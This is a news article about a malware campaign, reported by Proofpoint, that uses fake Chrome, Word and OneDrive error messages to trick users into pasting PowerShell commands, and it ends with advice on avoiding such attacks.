Malware only consists of computer codes, and that they're harmless when not executed.
This is where hackers have devised a new, deceptive method to trick users into installing a malware. The scheme involves enticing users with fake solutions to common errors in popular services such as Google Chrome, Microsoft Word and Microsoft OneDrive.
Once users are tricked to download and execute these "fixes" by clicking the Copy fix button, they unwittingly run a PowerShell or a Windows Run dialogue command that can compromise their systems.
The campaign uses error messages that are sent to unsuspecting users through emails, as well as website overlays.
These messages are used to trick users into downloading fake browser updates, which are then used to install malware onto a user’s device.
The malware in question spread through clever socially engineered techniques, said researchers from cybersecurity firm Proofpoint who discovered it, in a blog post.
Proofpoint threat researchers have noticed that a clever #socialengineering tactic is becoming increasingly popular amongst threat actors.https://t.co/gpQyGEfIo9
The campaign tricks end users into copying and pasting malicious PowerShell scripts, ultimately installing malware. pic.twitter.com/Jh1neNd9rU— Threat Insight (@threatinsight) June 17, 2024
The researchers found three attack chains that are being utilized to spread malware.
The first method, involves showing users with a warning saying there is a problem in displaying a webpage. The warning prompts the user to install a “root certificate” by copying a PowerShell script into the Windows Clipboard, and then run the code in a Windows Admin console. This script is used to display decoy messages while it downloads and installs an info-stealer onto the device.
The second method also uses compromised websites, but uses overlays of Google Chrome errors.
The third method involves the attackers sharing an email resembling Microsoft Word document prompts to ask users to download what looks like "Word Online" extensions to view documents correctly. The error message also contains offers on "How to fix" and "Auto-fix" options, which contain commands that can be copied to the clipboard and pasted into PowerShell to resolve the error.
While the campaign depends on the lack of user awareness to deliver malware, the inability of Windows to detect and block malicious actions has further exacerbated the problem.
According to the researchers at Proofpoint, the malware has payloads that include Matanbuchus, DarkGate, NetSupport, XM Rig, Amadey Loader, a clipboard hijacker, and Lumma Stealer.
These malware campaigns are being used by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and the TA571 threat actor, known for operating as a spam distributor that sends large volumes of email, leading to malware and ransomware infections.
Distributed via malspam or web browser injects, the campaign shows users a popup that suggests an error occurred when opening the document or webpage.
As the notice offers a problem and solution simultaneously, users may be more inclined to take action w/o considering the risk.— Threat Insight (@threatinsight) June 17, 2024
Infected with a malware can be devastating. But dealing with these campaigns should be relatively easy, since there are plenty of precautions users can take to prevent falling victim to this type of sneaky attack.
First and foremost, users should always be careful with the attachments they download, even from a trustworthy source. And in this case, remember to never copy or paste any code.
Products from big respectable companies like Google and Microsoft will never ask average, and their general users to fiddle with codes, like ever.
So unless users are developers or programmers, tech companies will not bother asking users to debug or do things outside what is normal.
Second, a proper and updated antivirus and antimalware should also come in handy.
Our blog details examples of these campaigns we have tracked this year:
ClearFake browser update activity cluster campaign
ClickFix iframe activity cluster
TA571’s HTML attachment campaigns
We also list IOCs and link to the @ET_Labs ruleset.— Threat Insight (@threatinsight) June 17, 2024
Dealing with PowerShell scripts is not for those with a faint heart.
Even in plain test, PowerShell scripts can pose a unique risk compared to other types of plain text code. And because these scripts can be executed directly by the PowerShell interpreter, this makes them readily executable without needing compilation.
Users can easily run these scripts by copying and pasting them into a PowerShell console or running them as a script file, and this is the thing that makes the campaign dangerous.
"Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk," warns a report from ProofPoint.
The different attack chains show that hackers are actively experimenting with multiple methods to improve effectiveness and find more infection pathways to compromise a larger number of systems.